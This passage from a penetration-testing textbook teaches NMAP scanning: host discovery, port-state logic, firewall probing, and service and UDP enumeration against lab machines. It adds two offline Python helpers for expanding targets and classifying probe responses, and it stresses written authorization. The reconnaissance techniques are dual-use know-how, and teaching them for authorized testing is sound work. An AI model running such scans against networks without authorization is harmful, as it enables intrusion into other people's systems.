Introduction 


Vulnerability assessment and penetration testing have become very 
important, especially in the past couple of years. Organizations often have 
complex networks of assets storing sensitive data, and such assets are 
exposed to potential threats from the inside as well as from the outside. To 
get an overview of the security posture of an organization, conducting a 
vulnerability assessment is an essential step. Performing penetration tests 
requires a well-planned and methodical approach. 

To help you perform various tasks across the phases of the penetration 
testing lifecycle, there are tons of tools, scripts, and utilities available. Linux 
distributions such as Kali Linux even provide bundled tools to perform 
these tasks. 

It is natural to get overwhelmed with the number of tools available. 
However, there are a few tools that are so powerful and flexible that they 
alone can perform most of the tasks across the phases of the penetration 
testing lifecycle. 

This book will get you started with the fundamentals of three such 
tools: NMAP, OpenVAS, and Metasploit. Just by using these three tools 
alone, you will acquire extensive penetration testing capabilities. 

By the end of this book, you'll have a substantial understanding of 
NMAP, OpenVAS, and Metasploit and will be able to apply your skills in 
real-world pen testing scenarios. 




CHAPTER 1 


Introduction to NMAP 


Vulnerability assessment and penetration testing have gained high 
importance especially in the last couple of years. Organizations often have 
a complex network of assets storing sensitive data. Such assets are exposed 
to potential threats from inside as well as from outside the organization. To 
get an overview of the security posture of the organization, conducting a 
vulnerability assessment is essential. 

It is important to understand the clear difference between vulnerability 
assessments and penetration testing. To understand this difference, let’s 
consider a real-world scenario. You notice that your neighbor’s door isn’t 
locked properly, and the neighbor is not at home. This is a vulnerability 
assessment. Now if you actually open the neighbor’s door and enter the 
house, then that is a penetration test. In an information security context, 
you may notice that the SSH service is running with weak credentials; this 
is part of a vulnerability assessment. If you actually use those credentials 
to gain access, then it is a penetration test. Vulnerability assessments 
are usually safe to perform, while penetration tests, if not performed in a 
controlled way, can cause serious damage to the target systems. Even so, 
neither activity is risk-free or lawful without explicit written authorization 
and an agreed scope, so obtain both before you run a single scan. 

Thus, a vulnerability assessment is one of the essential prerequisites 
for conducting a penetration test. Unless you know what vulnerabilities 
exist on the target system, you won’t be able to exploit them. 
Performing penetration tests requires a well-planned and 
methodical approach. It is a multistep process. The following are the 
main phases of penetration testing: 


• Information gathering: Information gathering is the most important 
  phase of the penetration testing lifecycle. This phase is also referred 
  to as reconnaissance. It involves the use of passive techniques (public 
  records, DNS, search engines) and active techniques (probing the target 
  directly) to gather as much information as possible about the target 
  system. Thorough information gathering lays a solid foundation for the 
  later phases of the penetration testing lifecycle. 

• Enumeration: Once you have basic information about the target, the 
  enumeration phase uses various tools and techniques to probe the target 
  in detail. It involves finding out exactly which ports are open and which 
  service versions are running on the target system. 

• Vulnerability assessment: The vulnerability assessment phase involves 
  the use of various tools and methodologies to confirm the existence of 
  known vulnerabilities in the target system, typically by matching the 
  enumerated service versions against vulnerability databases and running 
  non-destructive checks. 

• Gaining access: From the previous phase, you have a list of probable 
  vulnerabilities for your target. You can now attempt to exploit these 
  vulnerabilities to gain access to the target system. 

• Escalating privileges: You may get access to your target system by 
  exploiting a particular vulnerability; however, that access may be 
  restricted to a low-privileged account. To infiltrate deeper, you need 
  to use various techniques to escalate your privileges to the highest 
  level, such as administrator or root. 

• Maintaining access: Now that you have worked hard to gain access to the 
  target system, you will want that access to persist across reboots and 
  credential changes. This phase involves using various techniques to make 
  access to the target system persistent. 

• Covering tracks: The penetration process may leave garbage files behind, 
  modify configuration files, change registry entries, generate audit log 
  entries, and so on. Covering your tracks involves cleaning up all the 
  traces left during the previous phases. In an authorized engagement this 
  cleanup is done as agreed with the client and documented in the report. 


To perform various tasks in these phases, there are hundreds of tools, 
scripts, and utilities available. Linux distributions such as Kali Linux even 
provide bundled tools to perform these tasks. 

It is natural to get overwhelmed with the number of tools available. 
However, there are a few tools that are so powerful and flexible that they 
alone can perform most of the tasks in all of these phases. 

This book is about three such tools: NMAP, OpenVAS, and Metasploit. 
Just having these three tools in your arsenal can provide extensive 
penetration testing capabilities. 

Table 1-1 describes how these tools can be used in the various phases of 
the penetration testing lifecycle. 

Table 1-1. Tools for Pen Testing Phases 

Penetration Testing Phase    Tool 
Information gathering        NMAP, Metasploit 
Enumeration                  NMAP, Metasploit 
Vulnerability assessment     OpenVAS 
Gaining access               Metasploit 
Escalating privileges        Metasploit 
Maintaining access           Metasploit 
Covering tracks              Metasploit 

From this table, it is evident that the three tools between them cover 
all the phases of the penetration testing lifecycle. (NMAP's own scripts 
can also perform a number of vulnerability checks, but OpenVAS is the 
dedicated vulnerability scanner of the three.) 

This book focuses on these three tools and helps you get started with 
fundamentals of each of these tools. This chapter will cover NMAP. 


NMAP 


Now that you have a fair idea of the different phases in the penetration 
testing lifecycle and what tools are required, let’s move on to our first 
tool, NMAP. You’ll learn about various features of NMAP including the 
following: 


• Installing NMAP 
• Using NMAP with ZENMAP 
• Understanding the NMAP port states 
• Conducting basic scanning with NMAP 
• Understanding TCP scans versus UDP scans 
• Enumerating target operating systems and services 
• Fine-tuning the scans 
• Using NMAP scripts 
• Invoking NMAP from Python 


NMAP Installation 


NMAP can be installed on both Windows and Unix-based systems. To 
install NMAP on Windows, go to https://nmap.org/download.html, download 
the installer, and run it. 

For Unix-based systems, you can install NMAP from the command line. 
Security distributions like Kali Linux have NMAP installed by default. 
For other distributions, it needs to be installed separately. 

On Debian-based systems, use the command apt install nmap (as root, or 
with sudo), as shown in Figure 1-1. This command installs NMAP along with 
all of its required dependencies. Note that many of the scan types covered 
in this chapter (SYN, UDP, protocol, and ACK scans, and OS detection) send 
raw packets and must be run as root; an unprivileged user gets a slower 
TCP connect scan (-sT) instead. 
root@sagar-virtual-machine:~# nmap 
Command 'nmap' not found, but can be installed with: 
apt install nmap 

root@sagar-virtual-machine:~# apt install nmap 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following additional packages will be installed: 
  libblas3 liblinear3 
Suggested packages: 
  liblinear-tools liblinear-dev ndiff 
The following NEW packages will be installed: 
  libblas3 liblinear3 nmap 
0 upgraded, 3 newly installed, 0 to remove and 119 not upgraded. 
Need to get 5,353 kB of archives. 
After this operation, 24.5 MB of additional disk space will be used. 
Do you want to continue? [Y/n] y 
Get:1 http://in.archive.ubuntu.com/ubuntu bionic/main amd64 libblas3 amd64 3.7.1-4ubuntu1 [140 kB] 
Get:2 http://in.archive.ubuntu.com/ubuntu bionic/main amd64 liblinear3 amd64 2.1.0+dfsg-2 [39.3 kB] 
Get:3 http://in.archive.ubuntu.com/ubuntu bionic/main amd64 nmap amd64 7.60-1ubuntu5 [5,174 kB] 
Fetched 5,353 kB in 13s (425 kB/s) 
(Reading database ... 125731 files and directories currently installed.) 
Unpacking libblas3:amd64 (3.7.1-4ubuntu1) ... 
Unpacking liblinear3:amd64 (2.1.0+dfsg-2) ... 
Unpacking nmap (7.60-1ubuntu5) ... 
Setting up libblas3:amd64 (3.7.1-4ubuntu1) ... 
Setting up liblinear3:amd64 (2.1.0+dfsg-2) ... 
Setting up nmap (7.60-1ubuntu5) ... 
root@sagar-virtual-machine:~# 

Figure 1-1. Installing NMAP on a Debian-based system 


Introduction to NMAP and ZENMAP 


NMAP was initially a command-line utility. On a Linux terminal, you can 
simply type the command nmap with no arguments to get started. Figure 1-2 
shows the output of the nmap command: a summary of the target syntax, scan 
types, and options that can be used to scan a target. 
root@kali:~# nmap 
Nmap 7.60 ( https://nmap.org ) 
Usage: nmap [Scan Type(s)] [Options] {target specification} 
TARGET SPECIFICATION: 
  Can pass hostnames, IP addresses, networks, etc. 
  Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 
  -iL <inputfilename>: Input from list of hosts/networks 
  -iR <num hosts>: Choose random targets 
  --exclude <host1[,host2][,host3],...>: Exclude hosts/networks 
  --excludefile <exclude_file>: Exclude list from file 
HOST DISCOVERY: 
  -sL: List Scan - simply list targets to scan 
  -sn: Ping Scan - disable port scan 
  -Pn: Treat all hosts as online -- skip host discovery 
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports 
  -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 
  -PO[protocol list]: IP Protocol Ping 
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes] 
  --dns-servers <serv1[,serv2],...>: Specify custom DNS servers 
  --system-dns: Use OS's DNS resolver 
  --traceroute: Trace hop path to each host 
SCAN TECHNIQUES: 
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans 
  -sU: UDP Scan 
  ... 

Figure 1-2. Output of the nmap command on the terminal 


ZENMAP is a graphical front end to NMAP. It offers the same 
functionality in a more user-friendly way. ZENMAP is part of the default 
Kali Linux installation and can be accessed at Applications > Information 
Gathering > ZENMAP. Figure 1-3 shows the initial ZENMAP screen. The 
ZENMAP interface has three main configurable settings. 


• Target: This can be a single IP address, a list of IP addresses, a 
  hostname, or an entire subnet, in any format NMAP accepts on the command 
  line. 

• Profile: ZENMAP ships with several predefined scan profiles (Ping scan, 
  Quick scan, Intense scan, and so on), each of which corresponds to a 
  particular combination of NMAP switches. You can pick one of the 
  available profiles or define a custom profile to suit your requirements. 

• Command: Once you enter a target and select a profile, ZENMAP populates 
  the Command field with the exact nmap command line it is about to run. 
  You can edit this field directly to add or change switches, which also 
  makes ZENMAP a convenient way to learn the command-line syntax. 


Figure 1-3. Initial screen/interface of ZENMAP 


NMAP Port States 


Though the current version of NMAP is capable of performing many tasks, 
it started out as a port scanner. For every port it probes, NMAP looks at 
the response (or the absence of one) and assigns the port one of the 
following predefined states: 


Open: An application on the target is actively accepting TCP connections 
or UDP packets on the port. Open ports are the main focus of a penetration 
test, because each one is a potential way in. 


Closed: The port is reachable (the target answers NMAP's probes, typically 
with a TCP RST or an ICMP port-unreachable message), but no application is 
listening on it. A closed port still tells you the host is up, and the port 
may become Open later if a service is started. 


Filtered: A firewall, filter, or other network obstacle is dropping the 
probes, so NMAP cannot tell whether the port is open or closed. Filtered 
ports slow a scan down considerably, because NMAP has to retry before 
giving up. 


Unfiltered: The port is reachable, but NMAP cannot determine whether it 
is open or closed. Only the ACK scan (-sA), which is used to map firewall 
rules, reports this state; a SYN or service scan can then classify the 
port further. 


Open|Filtered: NMAP cannot tell whether the port is open or filtered. This 
is the usual result of scan types in which an open port gives no response, 
such as UDP, NULL, FIN, and Xmas scans. 


Closed|Filtered: NMAP cannot tell whether the port is closed or filtered. 
This state is reported only by the IP ID idle scan (-sI). 


Basic Scanning with NMAP 


NMAP is a complex tool with numerous options and switches available. 
In this section, you'll see various NMAP usage scenarios starting with the 
most basic scans. 

Before you get into the actual scanning, it is important to note that 
NMAP is a noisy tool. It generates a lot of network traffic, and many 
intrusion detection and intrusion prevention systems will detect, log, and 
possibly block it. A default scan probes the 1,000 most commonly used TCP 
ports on every host; against a /24 subnet that is roughly a quarter of a 
million probes before any service detection or scripts are added, and 
version detection, OS detection, and scripts multiply the traffic further. 
Hence, it is essential to know exactly what each switch you use does and 
to keep your scans within the agreed scope. 
Basic Scan on a Single IP 
Here's the command: 

nmap -sn <target IP address> 


Let's start with a basic ping scan on a single target. A ping scan (-sn) 
does not check for any open ports; it only tells you whether the target is 
alive. Despite the name, it does not rely on ICMP echo alone: as root, NMAP 
sends an ICMP echo request, a TCP SYN to port 443, a TCP ACK to port 80, 
and an ICMP timestamp request, and on a local Ethernet segment it uses ARP 
requests instead, which is why later figures in this chapter report hosts 
as up with the reason arp-response. Figure 1-4 shows the output of a ping 
scan done on a single target IP address. 


Figure 1-4. Output of basic NMAP scan done on single IP address 


Basic Scan on an Entire Subnet 
Here's the command: 

nmap -sn <target IP subnet> 


In a practical scenario, you may have many IP addresses to check. To get 
a quick overview of which hosts in a given subnet are alive, you can run an 
NMAP ping scan on the entire subnet. A subnet is just a logical division of 
the network. Scanning the entire subnet gives you an overview of which 
systems are present on the network. NMAP accepts the subnet either in CIDR 
notation (192.168.25.0/24) or as an octet range (192.168.25.0-255); both 
denote the same 256 addresses. Figure 1-5 shows the output of a ping scan 
done on 192.168.25.0-255. You can see that out of the 256 addresses 
scanned, only seven hosts are up. Now you can probe these seven hosts 
further and get more detailed information. 
nmap -sn 192.168.25.0-255 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-17 11:03 IST 
Nmap scan report for 192.168.25.1 
Host is up (0.00028s latency). 
MAC Address: 00:50:56:C0:00:08 (VMware) 
Nmap scan report for 192.168.25.2 
Host is up (0.00030s latency). 
... 
Nmap scan report for 192.168.25.132 
Host is up (0.00035s latency). 
MAC Address: 00:0C:29:4C:B8:59 (VMware) 
Nmap scan report for 192.168.25.133 
Host is up (0.00029s latency). 
MAC Address: 00:0C:29:F6:AA:96 (VMware) 
... 
Nmap scan report for 192.168.25.128 
Host is up. 
Nmap done: 256 IP addresses (7 hosts up) scanned in 2.26 seconds 

Figure 1-5. Output of basic NMAP scan done on a subnet 
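The target notation used above (192.168.25.0-255 for a subnet, or the CIDR form 192.168.25.0/24, with hostnames and per-octet ranges as the nmap usage text in Figure 1-2 lists them) is worth being able to reason about before you scan, because the number of addresses a specification expands to is the number of hosts you will be probing. The following Python script is an added example, not code from the book or from the NMAP project: it expands NMAP-style target specifications (and the contents of an -iL-style file, with --exclude handling) into a concrete address list so you can count and review targets offline. The sample inputs are constructed from the addresses in this chapter; hostnames are passed through unresolved, since resolving them needs DNS.

```python
"""Expand Nmap-style target specifications into individual IPv4 addresses.

Added example, not code from the book or from Nmap: it implements the
target syntax Nmap's usage text lists (CIDR suffix, per-octet ranges,
comma lists, '-'/'*' wildcards) so you can see how many addresses a spec
covers before sending a single probe.  Hostnames are returned unchanged
because resolving them needs DNS.
"""
import ipaddress
import itertools
import re
from typing import Iterable, List, Optional

_DOTTED_QUAD = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
_OCTET_SPEC = re.compile(r"^[\d,*\-]+$")
_RANGE = re.compile(r"^(\d{1,3})(?:-(\d{1,3}))?$")


def _expand_octet(part: str) -> List[int]:
    """'5' -> [5]; '1-3' -> [1, 2, 3]; '1,3,5-7' -> [1, 3, 5, 6, 7]; '-' or '*' -> 0..255."""
    if part in ("-", "*"):
        return list(range(256))
    values: List[int] = []
    for piece in part.split(","):
        m = _RANGE.match(piece)
        if not m:
            raise ValueError(f"bad octet spec: {piece!r}")
        lo = int(m.group(1))
        hi = int(m.group(2)) if m.group(2) is not None else lo
        if not 0 <= lo <= hi <= 255:
            raise ValueError(f"octet range out of bounds: {piece!r}")
        values.extend(range(lo, hi + 1))
    return values


def expand_target(spec: str) -> List[str]:
    """Return every address a single Nmap target spec denotes, in Nmap's order."""
    spec = spec.strip()
    if "/" in spec:
        base, prefix = spec.rsplit("/", 1)
        if not _DOTTED_QUAD.match(base):
            return [spec]  # e.g. 'microsoft.com/24': needs DNS before it can be expanded
        # strict=False lets '192.168.25.1/24' mean the whole /24, as Nmap does; the
        # network and broadcast addresses are included, matching Nmap's '256 IP
        # addresses' for a /24.
        net = ipaddress.ip_network(f"{base}/{prefix}", strict=False)
        return [str(a) for a in net]
    octets = spec.split(".")
    if len(octets) == 4 and all(_OCTET_SPEC.match(o) for o in octets):
        expanded = [_expand_octet(o) for o in octets]
        # itertools.product varies the last octet fastest, which is Nmap's order too
        return [".".join(map(str, combo)) for combo in itertools.product(*expanded)]
    return [spec]  # hostname


def expand_targets(specs: Iterable[str], exclude: Optional[Iterable[str]] = None) -> List[str]:
    """Expand several specs (command-line arguments or -iL entries) and drop
    anything matched by --exclude, keeping first-seen order without duplicates."""
    excluded = set()
    for spec in exclude or ():
        excluded.update(expand_target(spec))
    seen = set()
    result: List[str] = []
    for spec in specs:
        for addr in expand_target(spec):
            if addr in excluded or addr in seen:
                continue
            seen.add(addr)
            result.append(addr)
    return result


def load_target_file(text: str) -> List[str]:
    """Split the contents of an -iL file: entries separated by any whitespace."""
    return text.split()


if __name__ == "__main__":
    # Constructed input: the subnet scanned in Figure 1-5 plus the hosts.txt of Figure 1-6.
    hosts_txt = "192.168.25.129\n192.168.25.130\n"
    targets = expand_targets(["192.168.25.0-255"] + load_target_file(hosts_txt))
    print(f"{len(targets)} addresses would be probed")  # 256: the file's hosts are already in the range
```

Running the script against the inputs from this chapter reports 256 addresses, the same count NMAP prints in Figure 1-5; the two hosts.txt entries are deduplicated because they already fall inside the range. Use expand_targets() on your scope list before an engagement to confirm that a CIDR typo has not silently turned a /24 into a /16.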


Scan Using an Input File 
Here's the command: 

nmap -sn -iL <file path> 


There might be a scenario where you need to scan a set of addresses that 
does not form a neat range. Instead of typing them all on the NMAP command 
line, you can put them in a file, one target per line (any target format 
NMAP accepts on the command line is allowed, separated by spaces, tabs, or 
newlines), and feed that file to NMAP with the -iL option. Figure 1-6 shows 
the content of the hosts.txt file, which contains a list of IP addresses. 
root@kali:~# cat Desktop/hosts.txt 
192.168.25.129 
192.168.25.130 
root@kali:~# 


Figure 1-6. Hosts file containing a list of IP addresses to be 
scanned 


Now you can simply feed the hosts.txt file to NMAP and perform the 
scan, as shown in Figure 1-7. 


nmap -sn -iL /root/Desktop/hosts.txt 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-25 15:22 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.00040s latency). 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 
Nmap scan report for 192.168.25.130 
Host is up (0.00070s latency). 
MAC Address: 00:0C:29:03:42:04 (VMware) 
Nmap done: 2 IP addresses (2 hosts up) scanned in 0.45 seconds 


Figure 1-7. Output of basic NMAP scan done on multiple IP 
addresses listed in hosts.txt file 


Reason Scan 
Here's the command: 

nmap --reason <target IP address> 


In a normal NMAP scan you get a list of ports and their states, but not 
why NMAP reached that verdict. The --reason option makes NMAP print, for 
every port (and for the host itself), the response that led to the reported 
state, as shown in Figure 1-8. For the default SYN scan used here, a port is 
reported open because the target answered with a SYN/ACK (reason syn-ack) 
and closed because it answered with a RST (reason reset, summarized as 
"991 resets" for the ports not shown). The host itself was judged up 
because it answered an ARP request, which is what NMAP uses for host 
discovery on a local Ethernet segment. The TTL printed next to each reason 
(ttl 128) is taken from the reply and is a first hint about the target's 
operating system: 128 is the default TTL on Windows, which fits the msrpc, 
netbios-ssn, and ms-wbt-server services listed. 


nmap --reason 192.168.25.130 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-25 15:31 IST 
Nmap scan report for 192.168.25.130 
Host is up, received arp-response (0.0016s latency). 
Not shown: 991 closed ports 
Reason: 991 resets 
PORT     STATE SERVICE       REASON 
21/tcp   open  ftp           syn-ack ttl 128 
25/tcp   open  smtp          syn-ack ttl 128 
110/tcp  open  pop3          syn-ack ttl 128 
135/tcp  open  msrpc         syn-ack ttl 128 
139/tcp  open  netbios-ssn   syn-ack ttl 128 
143/tcp  open  imap          syn-ack ttl 128 
445/tcp  open  microsoft-ds  syn-ack ttl 128 
587/tcp  open  submission    syn-ack ttl 128 
3389/tcp open  ms-wbt-server syn-ack ttl 128 
MAC Address: 00:0C:29:03:42:04 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds 


Figure 1-8. Output of reason NMAP scan done on a single IP 
address 
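The port states defined earlier in this chapter and the reasons printed by --reason are two views of the same decision: NMAP looks at what came back for each probe (a SYN/ACK, a RST, an ICMP unreachable error, a UDP payload, or nothing at all) together with the scan type that sent it. The following Python code is an added example, not part of the book or of NMAP: it encodes the rules NMAP documents for SYN, ACK, UDP, and NULL/FIN/Xmas scans as a classify() function returning (state, reason), plus a summarize() helper that aggregates results the way the "Not shown: 991 closed ports / Reason: 991 resets" lines do. The Response records are constructed by hand; nothing is sent to the network.

```python
"""Map probe responses to Nmap port states and --reason strings.

Added example, not code from the book or from Nmap itself: the rules are
the ones Nmap's documentation gives for SYN (-sS), ACK (-sA), UDP (-sU)
and NULL/FIN/Xmas (-sN/-sF/-sX) scans, and the reason strings use the
vocabulary --reason prints (syn-ack, reset, no-response, port-unreach ...).
Response records are constructed by hand; nothing is sent on the wire.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, Tuple

# ICMP type 3 codes that Nmap treats as an "unreachable" error during a port scan
ICMP_UNREACH_REASON: Dict[int, str] = {
    0: "net-unreach",
    1: "host-unreach",
    2: "proto-unreach",
    3: "port-unreach",
    9: "net-prohibited",
    10: "host-prohibited",
    13: "admin-prohibited",
}

SYN_SCAN = {"S"}
STEALTH_SCANS = {"N", "F", "X"}  # NULL, FIN, Xmas: an open port is expected to stay silent


@dataclass(frozen=True)
class Response:
    """What came back for one probe: kind is 'tcp', 'udp', 'icmp' or 'none'."""
    kind: str
    tcp_flags: str = ""  # e.g. 'SA' for SYN/ACK, 'RA' for RST/ACK
    icmp_type: int = -1
    icmp_code: int = -1


def classify(scan: str, resp: Response) -> Tuple[str, str]:
    """Return (state, reason) for a probe of scan type 'S', 'A', 'U', 'N', 'F' or 'X'."""
    if scan not in SYN_SCAN | {"A", "U"} | STEALTH_SCANS:
        raise ValueError(f"unsupported scan type: {scan!r}")

    if resp.kind == "none":
        # Silence is ambiguous for UDP and for NULL/FIN/Xmas, where an open port does
        # not reply; for SYN and ACK scans it means a filter dropped the probe.
        if scan == "U" or scan in STEALTH_SCANS:
            return "open|filtered", "no-response"
        return "filtered", "no-response"

    if resp.kind == "icmp":
        if resp.icmp_type != 3 or resp.icmp_code not in ICMP_UNREACH_REASON:
            raise ValueError("only ICMP destination-unreachable errors are classified here")
        reason = ICMP_UNREACH_REASON[resp.icmp_code]
        if scan == "U" and resp.icmp_code == 3:
            return "closed", reason  # UDP: port unreachable is the 'closed' signal
        return "filtered", reason  # any other unreachable: something in the path objected

    if resp.kind == "udp":
        if scan != "U":
            raise ValueError("a UDP payload reply only makes sense for a UDP scan")
        return "open", "udp-response"

    if resp.kind == "tcp":
        flags = set(resp.tcp_flags.upper())
        if "R" in flags:
            if scan == "A":
                return "unfiltered", "reset"  # ACK scan: RST proves reachability, nothing more
            return "closed", "reset"
        if {"S", "A"} <= flags and scan == "S":
            return "open", "syn-ack"
        raise ValueError(f"unexpected TCP flags {resp.tcp_flags!r} for scan {scan!r}")

    raise ValueError(f"unknown response kind: {resp.kind!r}")


def summarize(results: Iterable[Tuple[int, str, str]]) -> Dict[str, Counter]:
    """Aggregate (port, state, reason) tuples per state, as Nmap's
    'Not shown: 991 closed ports / Reason: 991 resets' summary does."""
    by_state: Dict[str, Counter] = {}
    for _port, state, reason in results:
        by_state.setdefault(state, Counter())[reason] += 1
    return by_state


if __name__ == "__main__":
    # Constructed replies for a SYN scan of three ports on one host.
    replies = {
        21: Response("tcp", tcp_flags="SA"),
        22: Response("tcp", tcp_flags="RA"),
        23: Response("none"),
    }
    rows = [(port, *classify("S", r)) for port, r in replies.items()]
    for port, state, reason in rows:
        print(f"{port}/tcp  {state:<9} {reason}")
    print(summarize(rows))
```

The asymmetry the code makes explicit is the one that trips people up in practice: silence means "filtered" for a SYN scan but "open|filtered" for a UDP scan, and an ICMP port-unreachable means "filtered" for TCP but "closed" for UDP. When a --reason listing shows many no-response entries, expect either a firewall or, for UDP, simply services that do not answer empty probes.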


Supported Protocols 
Here's the command: 

nmap -sO <target IP address> 


As part of information gathering, it may be worthwhile to know which IP 
protocols the target supports. The protocol scan (-sO) sends a raw IP 
packet for each of the 256 protocol numbers and classifies the result much 
as port states are classified: any reply means open, an ICMP 
protocol-unreachable error means closed, and no reply means 
open|filtered. Because it sends raw IP packets, it must be run as root. 
Figure 1-9 shows that this target answered for two protocols, ICMP (1) 
and TCP (6); 222 protocols were reported closed and 32 open|filtered. 
Waiting out the retransmission timeouts for those 32 is why the scan took 
about 240 seconds. 
nmap -sO 192.168.25.129 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-25 15:27 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.00097s latency). 
Not shown: 222 closed protocols, 32 open|filtered protocols 
PROTOCOL STATE SERVICE 
1        open  icmp 
6        open  tcp 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 240.68 seconds 


Figure 1-9. Output of NMAP protocol scan done on a single IP address 


Firewall Probe 
Here's the command: 

nmap -sA <target IP address> 


In an enterprise network full of firewalls, intrusion detection systems, 
and intrusion prevention systems, it is quite possible that your NMAP scans 
will not only be detected but also blocked. The ACK scan (-sA) is NMAP's 
way of finding out whether a filtering device sits between you and the 
target. It sends TCP packets with only the ACK flag set; a host that is 
not behind a stateful filter answers every such packet with a RST, whether 
the port is open or closed, so the port is reported as unfiltered. Ports 
that produce no reply, or an ICMP unreachable error, are reported as 
filtered. Note that an ACK scan never tells you whether a port is open; it 
only maps the filtering. Figure 1-10 shows that all 1,000 ports scanned 
were unfiltered, so there was no filtering device between the scanner and 
this target. 


nmap -sA 192.168.25.129 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-25 15:36 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.0028s latency). 
All 1000 scanned ports on 192.168.25.129 are unfiltered 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 6.43 seconds 


Figure 1-10. Output of NMAP firewall probe done against a single IP 
address 
Topology 


ZENMAP has an interesting feature that helps you visualize the network 
topology. Say you did a ping scan on the subnet and found a few hosts 
alive. Figure 1-11 shows the network topology diagram for the hosts that 
you found alive. The diagram can be accessed using the Topology tab 
within the ZENMAP interface. 


Figure 1-11. Host topology diagram in ZENMAP 


Quick TCP Scan 


Here's the command: 

nmap -T4 -F <target IP address> 


Now that you have a list of hosts that are alive within the subnet, you 
can perform more detailed scans to find out the ports and services running 
on them. ZENMAP's Quick Scan profile runs nmap -T4 -F: the -F (fast) option 
scans only the 100 most common ports instead of the default 1,000, and -T4 
selects an aggressive timing template that is appropriate for a fast, 
reliable LAN. You can set the target IP address, select Quick Scan as the 
profile, and execute the scan. Figure 1-12 shows the output of a scan 
highlighting several open ports on the target. 
nmap -T4 -F 192.168.25.129 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-17 11:23 IST 
... 
111/tcp  open  rpcbind 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
... 
2049/tcp open  nfs 
2121/tcp open  ccproxy-ftp 
3306/tcp open  mysql 
5432/tcp open  postgresql 
5900/tcp open  vnc 
6000/tcp open  X11 
8009/tcp open  ajp13 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds 


Figure 1-12. Output of quick TCP NMAP scan done on a single IP 
address 


Service Enumeration 


Here's the command: 

nmap -sV <target IP address> 


Now that you have a live host and know which ports are open, it's time 
to enumerate the services behind those ports. For example, you can see 
that port 21 is open. Next you need to know which service is associated 
with it and the exact version of the server providing that service. You 
can use the command nmap -sV <target IP address>, as shown in Figure 1-13. 
The -sV switch enables service version detection: instead of guessing from 
the port number alone, NMAP completes the connection, reads any banner, 
and sends protocol-specific probes to identify the product and version. 
This is slower and more intrusive than a plain port scan, but enumerating 
services and their exact versions (vsftpd 2.3.4 on port 21 here, for 
instance) provides a wealth of information for building further attacks. 
nmap -sV 192.168.25.129 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-17 14:52 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.0014s latency). 
Not shown: 977 closed ports 
PORT     STATE SERVICE     VERSION 
21/tcp   open  ftp         vsftpd 2.3.4 
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 
23/tcp   open  telnet      Linux telnetd 
25/tcp   open  smtp        Postfix smtpd 
53/tcp   open  domain      ISC BIND 9.4.2 
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2) 
111/tcp  open  rpcbind     2 (RPC #100000) 
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 
512/tcp  open  exec        netkit-rsh rexecd 
513/tcp  open  login       OpenBSD or Solaris rlogind 
514/tcp  open  tcpwrapped 
1099/tcp open  rmiregistry GNU Classpath grmiregistry 
1524/tcp open  shell       Metasploitable root shell 
2049/tcp open  nfs         2-4 (RPC #100003) 
2121/tcp open  ftp         ProFTPD 1.3.3 
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5 
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7 
5900/tcp open  vnc         VNC (protocol 3.3) 
6000/tcp open  X11         (access denied) 
6667/tcp open  irc         Unreal IRCd 
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3) 
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds 


Figure 1-13. Output of NMAP service scan done on a single IP 
address 


UDP Port Scan 


Here's the command: 

nmap -sU -p 1-1024 <target IP address> 


All the scans so far gave you information only about TCP ports. However, 
the target may also have services running on UDP ports, such as DNS, SNMP, 
NTP, and the NetBIOS name service. A default NMAP scan probes only TCP 
ports, so you need to scan for UDP ports and services explicitly. To scan 
the low-numbered UDP ports, use nmap -sU -p 1-1024 <target IP address>. 
The -sU parameter tells NMAP to send UDP probes, while -p 1-1024 restricts 
the scan to ports 1 through 1024. A UDP scan takes significantly longer 
than a TCP scan: open UDP ports usually do not answer an empty probe at 
all, so they come back as open|filtered, and closed ports are recognized 
only by ICMP port-unreachable replies, which most operating systems 
rate-limit (Linux sends about one per second by default). Figure 1-14 
shows the output of a sample UDP scan; it took more than 20 minutes for a 
single host and found the NetBIOS name and datagram services (137/udp and 
138/udp). Adding -sV makes NMAP send protocol-specific payloads, which can 
turn some open|filtered results into definite open ones. 
